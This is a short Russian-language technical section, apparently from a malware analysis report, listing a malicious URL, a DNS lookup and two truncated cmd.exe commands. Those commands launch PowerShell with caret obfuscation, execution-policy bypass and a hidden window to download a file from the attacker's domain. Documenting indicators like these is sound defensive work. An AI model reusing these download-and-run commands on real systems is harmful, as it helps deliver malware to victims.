Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wERs^HelL.eX^e ^-exe^cU^t^IoNp^Oli^Cy^ BYPA^sS -Nop^rofi^lE^ ^-^w^inDO^wStYLE hI^d^DE^N^ (New-^ob^j^Ect SYS^TEm.^neT^.^w^eB^C^LiE^nT).^dOW^NloaD^f^i^Le^('http://lolotocopor...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /c "pO^wERs^HelL.eX^e ^-exe^cU^t^IoNp^Oli^Cy^ BYPA^sS -Nop^rofi^lE^ ^-^w^inDO^wStYLE hI^d^DE^N^ (New-^ob^j^Ect SYS^TEm.^neT^.^w^eB^C^LiE^nT).^dOW^NloaD^f^i^Le^('http://lolotocopor...' (со скрытым окном)